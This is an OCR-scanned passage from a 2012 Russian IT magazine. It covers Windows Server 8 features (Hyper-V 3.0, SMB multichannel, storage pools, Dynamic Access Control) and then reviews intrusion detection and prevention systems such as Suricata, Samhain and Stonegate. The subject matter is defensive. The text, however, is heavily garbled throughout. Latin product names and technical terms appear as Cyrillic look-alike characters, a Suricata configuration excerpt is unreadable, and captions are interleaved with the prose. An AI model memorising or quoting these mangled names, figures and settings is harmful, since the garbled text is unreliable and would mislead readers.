Далее мастер предлагает указать сервер(а) из списка или ѴйІ- 
диск. По окончании настройки вернуться к мастеру можно из окна 
ІЧоШісаІіоп. 



«ОБЛАКА» И НѴРЕР-Ѵ 



Первым широкой общественности был представлен обновленный 
Нурег-Ѵ 3.0, который превратился в одну из ключевых особен- 
ностей «восьмерки» и стал основой для создания частных и 
публичных «облаков». Заявлена поддержка до 160 логических 
СРІІ (ядер и потоков) и 2 Тб физической памяти, при этом каждая 
ѴМ может иметь до 32 ѵСРІІ и оперативную память объемом 512 Гб. 
Никаких лимитов по соотношению реальных и виртуальных СРІІ не 
установлено, можно запускать столько ѴМ, сколько потянет обору- 
дование. Отказоустойчивый кластер, построенный на ѴѴіп8, может 
содержать 63 узла с 4000 ѴМ, имеющими функции І_іѵе Мідгаііоп, 
балансировки нагрузки и МиШ-СЬаппеІ БМВ (эта функция обе- 
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спечиваетулучшенную пропускную способность и предоставляет 
несколько резервных каналов между сервером и хранилищем на 
удаленном файловом ресурсе). 

Поддержка технологий, речь о которых пойдет далее, была 
реализована еще в ѴѴіп2к8, теперь же они плотно интегрированы с 
гипервизором. Так, архитектура неравномерного доступа к памяти 
N ЦІ М А (ІМоп-ІІпіІюгт Метогу Ассезз) уменьшает задержки и повы- 
шает эффективность работы ѴМ. Это особенно касается мощных 
серверов, где Нурег-Ѵ показывает почти линейное масштабиро- 
вание. Технология ѴѴНЕА (ѴѴіпсІоѵѵз Нагбѵѵаге Еггог АгсЫіесІиге) 
адаптирует ѴМ к аппаратным сбоям, обнаруживая ошибки. Если 
устранить проблему нельзя, то система определяет, какая из ѴМ 
пострадала, и пытается ее перезапустить/восстановить, тогда как 
остальные продолжают работать в обычном режиме. Технология 
Нурег-Ѵ Рерііса позволяет создавать копию реплики данных и 
отправлять ее на удаленный сервер с последующим запуском. Это 
дает возможность быстро перейти на другой сервер или восстано- 
вить ресурс. 

Формат виртуальных дисков ѴРШХ изменен для улучшения 
масштабируемости, оптимизации и повышения надежности хра- 
нения данных и увеличения скорости. Максимальный объем может 
превышать 2 Тб (максимум 16 Тб), журнал уменьшает риск потери 
информации. Диски легко объединяются на лету без остановки 
работы ѴМ. Том может быть зашифрован при помощи ВіШоскег, что 
обеспечит защиту данных при размещении сервера в «облаке». 



РАБОТА С СЕТЬЮ И УДАЛЕННЫЙ ДОСТУП 



Чтобы ѴѴіп8 могла стать полноценной основой для построения «об- 
лака», в сетевую инфраструктуру и реализацию стека были вне- 
сены существенные изменения. С помощью консоли N10 Іеатіпд 
можно объединять до 32 сетевых интерфейсов (любых производи- 
телей) в один виртуальный (Ііпк аддгедаііоп), обеспечивая большую 
пропускную способность, балансировку нагрузки и автоматическое 
резервирование. 

Ранее для этого требовались утилиты сторонних разработчи- 
ков и однотипные сетевые карты. Штатная Сопігоі РапеІ не очень 
удобна для настройки большого количества сетевых интерфейсов 
(включая виртуальные), поэтому в ѴѴіп8 появился новый ком- 
плексный инструмент у правлен ия ІР-адресами — ІРАМ (ІР Асісігезз 
Мападетепі). Новые системы удобно добавлять в список благо- 
даря сканеру, который загружает в консоль все данные о найден- 
ных ІР-адресах (динамических и статических), после чего админ 
сортирует их и снабжает метками и описаниями. Доступны отчеты 
об использовании ІР-адресов. Имеются инструменты для контроля 



ОѴЫАМІС АССЕ55 СОЫТРОІ. 



РАС — новый механизм контроля доступа к файловой системе, 
который позволяет администратору определять единую политику 
доступа к файлам на уровне домена и применять ее ко всем 
существующим файл-серверам в домене. 



трафика ѴМ, выделяющие гарантированную полосу пропускания. 

Протокол 5МВ версии 2.2 получил новую функцию МиШ-СЬаппеІ 
5МВ, которая призвана устранить одно из типичных узких мест 
при передаче большого количества данных — низкую пропускную 
способность сети. 

Теперь для обмена информацией между системами по 5МВ 
одновременно используется несколько сетевых интерфейсов. 
Новая фича не только увеличивает производительность, но и по- 
вышает устойчивость в случае выхода из строя одной из сетевух 
сервера или маршрутизатора. Гипервизор, кстати, тоже поддержи- 
вает виртуальное соединение РіЬге СЬаппеІ между ѴМ по 5МВ. Все 
функции (захват, фильтрация трафика и роутинга) легко расши- 
ряемы, благодаря чему любой разработчик может добавить новые 
возможности. 

Алгоритм компонента ВгапсЬСасЬе также был модернизирован. 
Теперь, если в локалке уже имеется старая версия файла, функция 
дедупликации загружает с сервера только его измененную часть, 
а не весь файл. Ранее эта технология кеширования работала в фи- 
лиальных сетях, а в новой версии она адаптирована и для обмена 
данными в «облачных» сервисах. 

Важным дополнением является ОНСР (ЗиагсІ, который блоки- 
рует ОНСР-сообщения от неавторизованных виртуальных машин, 
претендующих на звание серверов ОНСР. Появились инструменты 
для работы с ОНСР {аііоѵег. Технология 0М55ЕС позволяет работать 
с 0Ы5-зонами, защищенными цифровой подписью, что исключает 
атаки типа 0Ы5 ЭрооЛпд. 

Теперь для удаленного доступа к внутренним ресурсам вместо 
нескольких ролей (Оігесі Асеева и ѴРЫ) предлагается единая 
ІІпіПесІ Ретоіе Ассезз. Технология йігесі Ассевв (читай статью 
«Синхронный заплыв на дальнюю дистанцию», ][_09_201 1 ) пред- 
ставляет собой предпочтительное решение для создания такого 
подключения. Сервер больше не требуется размещать в РМ2, он 




Мастеру добавления роли можно указать любой сервер или виртуальный диск 



Штатные инструменты позволяют объединить сетевые интерфейсы 
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К новому меню «Пуск» придется привыкать 



может находиться и за ЫАТ'ом. Настройка сервера и соединений 
упрощена, за всё отвечает мастер. 

Нововведения не обошли стороной и службу Ретоіе Безкіор 
Бегѵісе. Благодаря наличию нового кодека и поддержке протоко- 
лов ТСР и ІЮР трафик снижается на 10 % по сравнению с предыду- 
щей версией. Технология РетоІеРХ, впервые появившаяся в 
ѴѴіп2к8Р25Р1, позволяет виртуализировать видеоадаптер сервера 
и при удаленном РБР-подключении к виртуальным машинам ис- 
пользовать полноценные графические эффекты, включая БігесіХ. 

В поставку ѴѴіп8 включена улучшенная версия РетоІеРХ, не тре- 
бующая массивов 6РІІ. Настройка сервиса значительно упрощена, 
хранилище образов ѴБІ оптимизировано. Теперь администратор, 
используя один шаблон как основу, может создавать индивидуаль- 
ные сессии для каждого пользователя. Чтобы система не обраща- 
лась каждый раз к серверу, используется локальный кеш, образы 
могут храниться на локальном диске или сетевых ресурсах. 

Код сервера и клиента ЫР5 был переписан с нуля. Теперь он 
работает гораздо быстрее, что должно улучшить взаимодействие с 
*піх-системами. 



ХРАНЕНИЕ ДАННЫХ 



Концепция системы хранения информации была пересмотрена, 
чтобы сервер мог работать с большими объемами данных, раз- 
мещенных на нескольких сотнях виртуальных дисков. Теперь она 
включает зіогаде рооіз, то есть массивы дисков, которые могут 
быть использованы для хранения ѴБІ, и зіогаде зрасез — инстру- 
менты для настройки производительности и отказоустойчивости. 
Новые диски добавляются в пул по мере необходимости и автома- 
тически подхватываются системой хранения данных как единый 
зіогаде рооі. И главное, нет необходимости покупать софт сторон- 
них разработчиков для 5АТА- и 5А5-дисков. Функция дедуплика- 
ции позволяет экономить объем за счет исключения избыточных 
данных в дисковом хранилище. 

В случае сбоя проверка большого диска на ошибки при по- 
мощи СНКБ5К может занять достаточно много времени, в течение 
которого сервер будет недоступен. В ѴѴіп8 СЬескБізк запускается 
в онлайн-режиме и проверяет только проблемный раздел. Сам про- 
цесс занимает всего несколько секунд. 

Чтобы избежать утечки информации, необходимо четко уста- 
новить права доступа к файлам и устройствам для пользователей 
и групп, но чем больше становится данных, тем тяжелее ими управ- 
лять. Функция динамического доступа, которая появилась в ѴѴіп8, 
автоматизирует работу со списками контроля доступа, используя 



метаданные и теги документов. Расширяемая архитектура позво- 
ляет интегрировать новые разграничительные политики доступа 
к ресурсам с АСІ_ и другими инструментами аудита и управления 
доступом. Что в итоге обеспечит централизованную защиту на 
уровне доменов файлов, а также папок поверх всех имеющихся 
разрешений файлов. 

Администратору уже не нужно знать, на каких ресурсах 
находятся файлы и каталоги. Правила задаются при помощи 
функций Ай и групповых политик и применяются автоматически 
при создании объекта. При этом пользователь может просмотреть 
список автоматически предлагаемых АСІ_ или выбрать другие, 
более подходящие. В АСБ учитывается и контекст запроса. Напри- 
мер, пользователь может прочитать файл, находясь во внутренней 
сети, но получить отказ при подключении через ѴРІЧ. Сообщения 
о причине блокировки можно редактировать. Также можно задать 
порядок действий для получения доступа. Все соответствующие 
настройки задаются централизованно. 



АСТІѴЕ РІРЕСТОРУ 



Изменения, учитывающие особенности работы новой версии ОС, 
коснулись и службы каталогов Асііѵе Бігесіогу. Все настройки, 
начиная с процесса развертывания, максимально упрощены. После 
установки роли Асііѵе Бігесіогу Ботаіп Бегѵісез в Бегѵег Мападег 
появляется ссылка, позволяющая запустить мастер, который 
функционально напоминает ранее использовавшийся БСРРОМО. 

В процессе создания домена можно установить функциональный 
уровень леса/домена от ѴѴіп2кЗ до ѴѴіп8. 

В ѴѴіп2к8Р2 появился новый центр администрирования Асііѵе 
Бігесіогу (Асітіпізігаііѵе Сепіег, АБАС), построенный поверх 
РоѵѵегБЬеІ I. Его назначение тогда было не совсем понятно, так как, 
хотя он и обеспечивал удобный доступ к некоторым функциям, 
многие из них дублировались в ММ С. В ѴѴіп8 АБАС был усовершен- 
ствован. Многие настройки стали более удобными и понятными 
(например, настройка РСРР — Ілпе-дгаіпесІ раззѵѵогсі роіісіез, ранее 
выполняемая при помощи АБ5І Есііі). Интерфейс позволяет про- 
сматривать использованные команды РоѵѵегБЬеІІ, которые можно 
копировать и вставлять в свои скрипты. Корзина Ай обзавелась 
графической оболочкой. 

Контроллер домена можно запускать на ѴМ со всеми вкусностя- 
ми — копии и снапшоты, позволяющие быстро развернуть резерв- 
ный КД. Чтобы не было путаницы и не возникали коллизии, при 
запуске копии с разными версиями КД во время создания снимка 
Ю аннулируется, а при загрузке гипервизор проверяет Ю текущего 
КД, запускает Зузгер и обновляет все данные, приводя систему в 
актуальное состояние. 




Штатный веб-сервер 115 версии 8.0 получил новые функцио- 
нальные возможности по интеграции с ѴѴіпсІоѵѵз Агиге, которые 
позволяют создавать легко масштабируемые «облачные» сервисы. 
Теперь 115 запускается в индивидуальной «песочнице» с регули- 
рованием максимального количества используемых СРІІ. Благо- 
даря проведенной оптимизации повысилась производительность, 
сервер требует в три раза меньше памяти. Одним из основных 
нововведений в 115 является поддержка протокола ѴѴеЬБоскеІз для 
обмена сообщениями между браузером и веб-сервером поверх ТСР. 

Таким образом, можно без особого труда подключать приложе- 
ния для асинхронных источников данных, написанные на НТМІ.5. 
Значительно упрощено управление 551-сертификатами. Теперь все 
они находятся в одном хранилище, администратор самостоятель- 
но настраивает их привязку к сайтам. Управлять сертификатами 
также можно при помощи РоѵѵегБЬеІІ. 



ЗАКЛЮЧЕНИЕ 



Как видишь, нововведений довольно много, и они впечатляют. 
Хотя, конечно, это еще не финальная версия, и к моменту релиза 
некоторые возможности вполне могут измениться. □С 



ХАКЕР 02/157/2012 



125 










5ѴЫ/АСК 



Сергей «дгіпсіег» Яремчук (дгіпііегйіих.іп.иа] 




НОВЫЕ 
ДОСПЕХИ 



для ІТ-инфраструктуры 



ПРИМЕНЕНИЕ ГО5/ 

ІР5 — ДЕЙСТВЕННЫЙ 
СПОСОБ 

ПРЕДОТВРАТИТЬ 
ВТОРЖЕНИЕ 
В КОРПОРАТИВНУЮ 
СЕТЬ 

В настоящее время защита, обеспечиваемая 
файерволом и антивирусом, уже 
не эффективна против сетевых атак 
и малварей. На первый план выходят решения 
класса Ю5/ІР5, которые могут обнаруживать 
и блокировать как известные, так и еще 
не известные угрозы. 



ТЕХНОЛОГИИ Ю5/ІР5 



Чтобы сделать выбор между Ю5 или ІР5, следует понимать их 
принципы работы и назначение. Так, задача Ю5 (Іпішзіоп йеіесііоп 
Бузіет) состоит в обнаружении и регистрации атак, а также опове- 
щении при срабатывании определенного правила. В зависимости 
оттипа, Ю5 умеют выявлять различные виды сетевых атак, обнару- 
живать попытки неавторизованного доступа или повышения при- 
вилегий, появление вредоносного ПО, отслеживать открытие ново- 
го порта и т. д. В отличие от межсетевого экрана, контролирующего 
только параметры сессии (ІР, номер порта и состояние связей), Ю5 
«заглядывает» внутрь пакета (до седьмого уровня 051), анализируя 
передаваемые данные. Существует несколько видов систем обна- 
ружения вторжений. Весьма популярны АРЮ5 (Арріісаііоп ргоіосоі- 
ЬазесІ Ю5), которые мониторят ограниченный список прикладных 
протоколов на предмет специфических атак. Типичными пред- 
ставителями этого класса являются РНРЮ5 ( рбрісіз.ога ). анализи- 







ІШП 



О Мос1_5еси- 
гііу и 6гееп50І_-РѴѴ 
читай в статье 
«Последний рубеж», 
][_ 12 _ 2010 . 

Как научить ірІаЫез 
«заглядывать» 
внутрь пакета, читай 
в статье «Огненный 
щит», ][_12_2010. 



ЫЬг.зГ.пеІ — сайтІРБ 
НодѵѵазИ І_ід№ ВК. 

сірИегсІупе.огд/ 
ГѵѵБпогі — сайт 
Рѵѵзпогі. 



РНР 05 

I пйі ІМ1Ш1 ЙЙСіЯГЕі Л» 



Т Ох Г - і ‘. И| [іу 




РНРШ5 блокирует неправильные РНР-запросы 
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рующий запросы к РНР-приложениям, М осІ Зеси гііу, защищающий 
веб-сервер (АрасЬе), и 0гееп5ОІ_-РѴѴ, блокирующий опасные 5(ЗІ_- 
команды (см. статью «Последний рубеж» в ][_12_2010). 

Сетевые N105 (Ыеіѵѵогк I пігизіоп йеіесііоп Бузіет] более уни- 
версальны, что достигается благодаря технологии йРІ Шеер Раскеі 
Іпзресііоп, глубокое инспектирование пакета). Они контролируют 
не одно конкретное приложение, а весь проходящий трафик, на- 
чиная с канального уровня. 

Для некоторых пакетных фильтров также реализована возмож- 
ность «заглянуть внутрь» и блокировать опасность. В качестве при- 
мера можно привести проекты ОрепйРІ ( ѵѵѵѵѵѵ.орепсірі.огд ) и Рѵѵзпогі 
( сірЬегбупе.огдЛѵѵзпогЧ . Последний представляет собой программу 
для преобразования базы сигнатур 5погІ в эквивалентные правила 
блокировки для ірІаЫез. Ріо изначально файервол заточен под 
другие задачи, да и технология ОРІ «накладна» для движка, поэтому 
функции по обработке дополнительных данных ограничены блоки- 
ровкой или маркированием строго определенных протоколов. Ю5 
всего лишь помечает (аіегі) все подозрительные действия. Чтобы 
заблокировать атакующий хост, администратор самостоятельно 
перенастраивает брандмауэр во время просмотра статистики. Есте- 
ственно, ни о каком реагировании в реальном времени здесь речи 
не идет. Именно поэтому сегодня более интересны ІР5 (Іпішзіоп 
Р геѵепііоп Зузіет, система предотвращения атак). Они основаны 
на Ю5 и могут самостоятельно перестраивать пакетный фильтр 
кли прерывать сеанс, отсылая ТСР Р5Т. В зависимости от принципа 
работы, ІР5 может устанавливаться «в разрыв» или использовать 
Зеркалирование трафика (5РАІЧ), получаемого с нескольких сенсо- 
ров. Например, в разрыв устанавливается НодѵѵазЬ І_ідЫ ВР ( ЫЬг. 

), которая работает на втором уровне 051. Такая система может 
не иметь ІР-адреса, а значит, остается невидимой для взломщика. 

В обычной жизни дверь не только запирают на замок, но и до- 
полнительно защищают, оставляя возле нее охранника, ведь 
только в этом случае можно быть уверенным в безопасности. В ІТ 
в качестве такого секьюрити выступают хостовые ІР5 (см. «Новый 
оборонительный рубеж» в ][_08_2009), защищающие локальную 
систему от вирусов, руткитов и взлома. Их часто путают с антиви- 
русами, имеющими модуль проактивной защиты. Но НІР5, как пра- 
вило, не используют сигнатуры, а значит, не требуют постоянного 
обновления баз. Они контролируют гораздо больше системных 
параметров: процессы, целостность системных файлов и реестра, 
записи в журналах и многое другое. 

Чтобы полностью владеть ситуацией, необходимо контролиро- 
ать и сопоставлять события как на сетевом уровне, так и на уров- 
е хоста. Для этой цели были созданы гибридные Ю5, которые 
оллектят данные из разных источников (подобные системы 
1 асто относят к 51 М — 5есигМ:у Іпіюгтаііоп Мападетепі). Среди 



П-.Г-І 




С Бигісаіа можно использовать все наработки к Зпогі, например БпогЬу 
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5УЫХАСК 



ОрепБоигсе-проектов интересен Ргеіисіе НуЬгісІ Ю5, собирающий 
данные практически со всех ОрепБоигсе Ю5/ІР5 и понимающий 
форматжурналов разных приложений (поддержка этой системы 
приостановлена несколько лет назад, но собранные пакеты еще 
можно найти в репозиториях І_іпих и *В50). 

В разнообразии предлагаемых решений может запутаться даже 
профи. Сегодня мы познакомимся с наиболее яркими представите- 
лями ЮБ/ІРБ-систем. 



51ІРІСАТА 



Разработчик: 0І5Р (Ореп Іпіогтаііоп Бесигііу Роипсіаііоп). 

ѴѴеЬ: ѵтѵѵ.орепіпіозесіоипсіаііоп.огд . 

Платформа: программная. 

ОС: І_іпих, *В50, Мае 05 X, Боіагіз, ѴѴіпсІоѵѵз/Судѵѵіп. 

Лицензия: ОІМІІ СРІ_. 

Бета-версия этой Ю5/ІР5 была представлена на суд обществен- 
ности в январе 2010-го после трех лет разработок. Одна из главных 
целей проекта — создание и обкатка совершенно новых технологий 
обнаружения атак. За Бигісаіа стоит объединение 0І5Р, которое 
пользуется поддержкой серьезных партнеров, включая ребят из 115 
Оерагітепі оі НотеІапсІ Бесигііу. Актуальным на сегодня является 
релиз под номером 1.1, вышедший в ноябре 2011 года. Код проекта 
распространяется под лицензией 6РІ_ѵ2, но финансовые партнеры 
имеют доступ к не 6РІ_-версии движка, которую они могут использо- 
вать в своих продуктах. Для достижения максимального результата 
к работе привлекается сообщество, что позволяет достигнуть очень 
высокого темпа разработки. Например, по сравнению с предыдущей 
версией 1.0, объем кода в 1.1 вырос на 70%. Некоторые современные 
Ю5 с длинной историей, в том числе и Бпогі, не совсем эффективно 
используют многопроцессорные/многоядерные системы, что приво- 
дит к проблемам при обработке большого объема данных. Бигісаіа 
изначально работает в многопоточном режиме. Тесты показывают, 
что она шестикратно превосходит Бпогі в скорости (на системе 
с 24 СРІІ и 128 ГБ ОЗУ]. При сборке с параметром '-^ 3616 - 0063 ' 
появляется возможность аппаратного ускорения на стороне 6РІІ. 
Изначально поддерживается ІРѵб (в Бпогі активируется ключом 
'--епаЫе-ірѵб'), для перехвата трафика используются стандартные 
интерфейсы: ЫЬРсар, ЫРОиеие, ІРРРіпд, ІРРѴѴ. Вообще, модульная 
компоновка позволяет быстро подключить нужный элемент для за- 
хвата, декодирования, анализа или обработки пакетов. Блокировка 
производится средствами штатного пакетного фильтра ОС (в Ыпих 
для активации режима ІР5 необходимо установить библиотеки 
пеіііпк-диеие и ІіЬпІпеІІіпк]. Движок автоматически определяет 




ЛИМЫ А4І-- Ау.-ѵ ч 




В продуктах ІВМ задействованы наработки онлайн-сервиса 6Т0С и Х-Рогсе 



ОБЪЕДИНЕННЫЙ КОНТРОЛЬ УГРОЗ 



Современный интернет несет огромное количество угроз, 
поэтому узкоспециализированные системы уже не актуальны. 
Необходимо использовать комплексное многофункциональное 
решение, включающее все компоненты защиты: файервол, Ш5/ 
ІР5, антивирус, прокси-сервер, контентный фильтр и антиспам- 
фильтр. Такие устройства получили название ІІТМ (Ііпіііесі 
ТНгеаІ Мападетепі, объединенный контроль угроз]. В качестве 
примеров ІІТМ можно привести Тгепсі Місго йеер Бесигііу ( 
Ігепгітісго.сот ), Кегіо Сопігоі ( кегіо.ги ). БопісѵѵаІІ ІЧеІѵѵогк Бе- 
сигііу ( зопісѵѵаП.еот ), Рогіібаіе Меіѵѵогк Бесигііу РІаІІогтз а псі 
АррІіапсеБ ( Іогііпеі.сот ) или специализированные дистрибутивы 
І_іпих, такие как Ііпіапдіе баіеѵѵау, ІРСор РігеѵѵаІІ, рІБепзе (читай 
их обзор в статье «Сетевые регулировщики», ][_01_2010). 



и парсит протоколы (ІР, ТСР, ІЮР, ІСМР, НТТР, ТІ_5, РТР, БМВ, 5МТР 
и 5СТР], поэтому в правилах необязательно привязываться к номеру 
порта (как это делает Бпогі), достаточно лишь задать действие для 
нужного протокола. Іѵап Різііс, автор Моб_зесип1у, создал специ- 
альную библиотеку НТР, применяемую в Бигісаіа для анализа НТТР- 
трафика. Разработчики прежде всего стремятся добиться точности 
обнаружения и повышения скорости проверки правил. 

Вывод результатов унифицирован, поэтому можно использовать 
стандартные утилиты для их анализа. Собственно, все бэк-энды, 
интерфейсы и анализаторы, написанные для Бпогі (ВагпуагсІ, 
Бпогізпагі, Бди М и т. д.), без доработок работают и с Бигісаіа. Это 
тоже большой плюс. Обмен по НТТР подробно журналируется 
в файле стандартного формата АрасЬе. 

Основу механизма детектирования в Бигісаіа составляют пра- 
вила (гиіез). Здесь разработчики не стали пока ничего изобретать, 
а позволили подключать рулсеты, созданные для других проектов: 
БоигсеГіге ѴРТ (можно обновлять через Оіпктазіег), ОрепБоигсе 
Етегдіпд ТЬгеаІз ( ЬетегаіпаіЬгеаІз.пеі ] и Етегдіпд Тбгеаіз Рго 
( етегдіпдіЬгеаІзрго.сот ]. В первых релизах поддержка была лишь 
частичной, и движок не распознавал и не загружал некоторые 
правила, но сейчас эта проблема решена. Реализован и собствен- 
ный формат гиіез, внешне напоминающий снортовский. Правило 
состоит из трех компонентов: действие (раза, бгор, ге]есІ или аіегі), 
заголовок (ІР/порт источника и назначения] и описание (что ис- 
кать]. В настройках используются переменные (механизм (Іоѵѵіпі), 
позволяющие, например, создавать счетчики. При этом информа- 
цию из потока можно сохранять для последующего использования. 
Такой подход, применяемый для отслеживания попыток подбора 
пароля, более эффективен, чем используемый в Бпогі метод, кото- 
рый оперирует пороговым значением срабатывания. Планируется 
создание механизма ІР Рериіаііоп (вроде БепзогВазе Сізсо, см. 
статью «Потрогай Сізсо» в ] [_07_20 1 1 ). 

Резюмируя, отмечу, что Бигісаіа — это более быстрый движок, 



БІЛгіСАТА — ЭТО БОЛЕЕ 
БЫСТРЫЙ ДВИЖОК, ЧЕМ 5Ы0КТ, 
ПОЛНОСТЬЮ СОВМЕСТИМЫЙ 
С НИМ ПО ПРАВИЛАМ И 
БЭК-ЭНДАМ 
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ТСГПІІППІ -4-м 
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В конфигѳ БатИаіп указывается, какие файлы необходимо контролировать 

чем Бпогі, полностью совместимый с ним по правилам и бэк-эндам 
и способный проверять большие сетевые потоки. Единственный 
недостаток проекта — скудная документация, хотя опытному ад- 
мину ничего не стоит разобраться с настройками. В репозиториях 
дистрибутивов уже появились пакеты для установки, а на сайте 
проекта доступны внятные инструкции по самостоятельной сборке 
из исходников. Есть и готовый дистрибутив ЗтооіЬ-зес [ Ьаііеѵ.зі/ 
Ыод/зтооіЬ-зес ), построенный на базе Зигісаіа. 



ЗАМНАІИ 



Разработчик: Батііаіп І_аЬз. 

ѴѴеЬ: ѵтѵѵ.Іа-затЬпа.гіе/затНаіп . 

Реализация: программная. 

ОС: ІІпіх, І_іпих, ѴѴіпсІоѵѵз/Судѵѵіп. 

Лицензия: ОІМІІ СРІ_ 

Выпускаемый под ОрепЗоигсе-лицензией Затбаіп относится 
к хостовым Ю5, защищающим отдельный компьютер. Он использу- 
ет несколько методов анализа, позволяющих полностью охватить 
все события, происходящие в системе: 

• создание при первом запуске базы данных сигнатур важных 
файлов и ее сравнение в дальнейшем с «живой» системой; 

• мониторинги анализ записей в журналах; 

• контроль входа/выхода в систему; 

• мониторинг подключений к открытым сетевым портам; 

• контроль файлов с установленным 511 Ю и скрытых процессов. 



Программа может быть запущена в невидимом режиме (задей- 
ствуется модуль ядра), когда процессы ядра невозможно обнаружить 
в памяти. ЗатИаіп также поддерживает мониторинг нескольких 
узлов, работающих под управлением разных ОС, с регистрацией всех 
событий в одной точке. При этом установленные на удаленных узлах 
агенты отсылают всю собранную информацию (ТСР, АЕ5, подпись) 
по зашифрованному каналу на сервер (уиіе), который сохраняет ее 
в БД (Му5С!І_, РозІдгеЗОЦ Огасіе). Кроме того, сервер отвечает за про- 
верку статуса клиентских систем, распространение обновлений 
и конфигурационных файлов. Реализовано несколько вариантов для 
оповещений и отсылки собранной информации: е-таіі (почта подпи- 
сывается во избежание подделки), зузіод, лог-файл (подписывается), 
Ыадіоз, консоль и др. Управление можно осуществлять с помощью 
нескольких администраторов с четко установленными ролями. 

Пакет доступен в репозиториях практически всех дистрибути- 
вов І_іпих, на сайте проекта есть описание, как установить ЗатЬаіп 
под ѴѴіпсІоѵѵз. 



БТОЫЕбАТЕ I ЫТРІІЗІ О N РРЕУЕІЧТІОМ 5У5ТЕМ 



Разработчик: БІопеБоК Согрогаііоп. 

ѴѴеЬ: ѵтѵѵ.БІопезоН.сот . 

Реализация: программно-аппаратная, образ ѴМѵѵаге. 

ОС: 32/64-битные ѴѴіпсіоѵѵб 2кЗ/ѴІ5Іа/7/2к8К2, 1_іпих [СепЮБ, 
КНЕІ_,5І_Е5). 

Лицензия: коммерческая. 
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5УЫХАСК 



Это решение разработано финской компанией, которая за- 
нимается созданием продуктов корпоративного класса в сфере 
сетевой безопасности. В нем реализованы все востребованные 
функции: ІР5, защита от 00о5- и Обау-атак, веб-фильтрация, 
поддержка зашифрованного трафика и т. д. С помощью БіопеСаІе 
ІР5 можно заблокировать вирус, зруѵѵаге, определенные при- 
ложения (Р2Р, ІМ и прочее). Для веб-фильтрации используется 
постоянно обновляемая база сайтов, разделенных на несколько 
категорий. Особое внимание уделяется защите от обхода систем 
безопасности АЕТ (Абѵапсеб Еѵазіоп ТесЬпщиез). Технология 
Тгапзрагепі Ассезз Сопігоі позволяет разбить корпоративную 
сеть на несколько виртуальных сегментов без изменения реаль- 
ной топологии и установить для каждого из них индивидуальные 
политики безопасности. Политики проверки трафика настраи- 
ваются при помощи шаблонов, содержащих типовые правила. 

Эти политики создаются в офлайн-режиме. Администратор 
проверяет созданные политики и загружает их на удаленные 
узлы ІР5. Похожие события в Біопебаіе ІР5 обрабатываются 
по принципу, используемому в 5ІМ/5ІЕМ-системах, что суще- 
ственно облегчает анализ. Несколько устройств легко можно 
объединить в кластер и интегрировать с другими решениями 
БіопеБоЙ — Біопебаіе Рі геѵѵа I І/ѴР N и Біопебаіе 55І_ ѴРІ\І. Управ- 
ление при этом обеспечивается из единой консоли управления 
(Біопебаіе Мападетепі Сепіег), состоящей из трех компонентов: 



Мападетепі Бегѵег, І_од Бегѵег и Мападетепі СІіепП Консоль 
позволяет не только настраивать работу ІР5 и создавать новые 
правила и политики, но и производить мониторинг и просматри- 
вать журналы. Она написана на баѵа, поэтому доступны версии 
для ѴѴіпбоѵѵз и І_іпих. 

Біопебаіе ІР5 поставляется как в виде аппаратного ком- 
плекса, так и в виде образа ѴМѵѵаге. Последний предназначен 
для установки на собственном оборудовании или в виртуальной 
инфраструктуре. И кстати, в отличие от создателей многих по- 
добных решений, ком пан ия -раз работник дает скачать тестовую 
версию образа. 



ІВМ 5ЕСІІРІТѴ ЫЕТѴѴОРК ІИТРІІЗІОМ 
РРЕУЕЫТЮЫ 5У5ТЕМ^НІНН 



Разработчик: ІВМ. 

ѴѴеЬ: /ѵѵ.іЬт.сот/ги . 

Реализация: программно-аппаратная, образ ѴМѵѵаге. 

Лицензия: коммерческая. 

Система предотвращения атак, разработанная ІВМ, исполь- 
зует запатентованную технологию анализа протоколов, которая 
обеспечивает превентивную защиту в том числе и от Обау-угроз. 
Как и у всех продуктов серии ІВМ Бесигііу, его основой является 
модуль анализа протоколов — РАМ (Ргоіосоі Апаіузів Мобиіе), 
сочетающий в себе традиционный сигнатурный метод обнаруже- 



» ТсгтілаІ 

ЙД*л Прлака 0ид Пдаси Іерыинлд ^правка 

5 саТ /еСс/зигісаТа/зигісаСа- гіеЬійп . уаігіі 

%ѴАМІ ал 



# МитЬег оТ раскеСз аНоиесІ Хй Ье ргосезБеР БііпиІІагееоиБІу. □еі'аиіі І5 а 

# сопзсгѵаііѵс 5Ѳ, а ЬідЬег писпЬег міН паке зиге СРУз/СРи еогез мііі Ье 

# тоге еазііу кері Ьизу, ЬиТ иШ педаТіѵеХу ітрасТ сасЬіпд. 

# 

# ІТ уои аге озіпд ІЬе СІІОА раТТегп таСскег <Ь2д_сигіа Ьеіом), сШХегегсТ гиіег 

# арріу. Хп іЬаТ сане Ьгу БоілеіЫпд Ііке 40ѲѲ ог тоге. ТЬіб іб Ьесаине ТЬе СІІОА 

# раііегп таісЬег зсапБ тапу раскеіБ іп рагаііеі, 

#тах-репс1іпд‘рвске1;5: 50 

# 5еЬ ІЬе оггіег оТ аіегіз ЬаззеР оп асСіолБ 

# ТЬе гіеТаиІІ: оггіег і$ разз, гігор, геіесі, аіегі 
асііоп-огсіег: 

- РЭ55 

- сі гор 

- геіесТ 

- аІегТ 



# ТЬе йеГаиІі Іоддіпд ЩгесТогу, Апу Іод ог оілрит Ше Ье 

# ріасей Ьеге іТ ііз поі зресіГіей міТЬ а Тиіі раТЬ паше. ТЫз сап Ье 

# оѵеггійсіеп; ѵ/ііЬ ІЬе -I сопшіаті Ііпе рагатеЬег. 

ОеТэии-Іод-сІіг : /ѵаг/Іод/зигісаТэ 

# сопШдиге ТЬе туре оТ аТегг (апй отЬег) Іоддіпд уои иоиій Ііке. 
оиТриІз: 



Конфигурационный файл Бигісаіа понятен тем, кто возился с настройками Бпогі 
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Новые доспехи для ІТ-инфраструктуры 



ния атак (Ргоѵепііа ОрепЗідпаІиге) и поведенческий анализатор. 
При этом РАМ различает 218 протоколов уровня приложений 
(атаки через ѴоІР, РРС, НТТР и т. д.) и такие форматы данных, 
как РОС, ХІ_5, РйР, АІ\ІІ, ЭРС, чтобы предугадывать, куда может 
быть внедрен вредоносный код. Для анализа трафика исполь- 
зуется более 3000 алгоритмов, 200 из них «отлавливают» 0о5. 
Функции межсетевого экрана позволяют разрешить доступ 
только по определенным портам и ІР, исключая необходимость 
привлечения дополнительного устройства. Технология ѴИиаІ 
РаІсЬ блокирует вирусы на этапе распространения и защищает 
компьютеры до установки обновления, устраняющего критиче- 
скую уязвимость. При необходимости администратор сам может 
создать и использовать сигнатуру. Модуль контроля приложений 
позволяет управлять Р2Р, ІМ, АсІіѵеХ-элементами, средствами 
